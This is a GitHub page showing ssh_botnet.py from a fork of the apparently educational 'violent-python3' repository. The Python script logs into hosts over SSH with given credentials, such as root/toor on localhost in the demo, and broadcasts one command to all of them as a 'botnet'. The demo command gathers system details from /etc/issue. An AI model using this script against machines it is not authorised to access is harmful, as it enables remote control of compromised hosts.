forked from EONRaider/violent-python3
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathssh_botnet.py
More file actions
43 lines (32 loc) · 1.09 KB
/
Copy pathssh_botnet.py
File metadata and controls
43 lines (32 loc) · 1.09 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pexpect import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
session = pxssh.pxssh()
session.login(self.host, self.user, self.password)
return session
except Exception as e:
print(f'[-] Error Connecting: {e}')
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnet_command(command):
for client in botnet:
output = client.send_command(command).decode('utf-8')
print(f'[*] Output from {client.host}')
print(f'[+] {output}')
def add_client(host, user, password):
client = Client(host, user, password)
botnet.append(client)
if __name__ == '__main__':
botnet = []
add_client('127.0.0.1', 'root', 'toor')
add_client('127.0.0.1', 'root', 'toor')
add_client('127.0.0.1', 'root', 'toor')
botnet_command('uname -v && cat /etc/issue')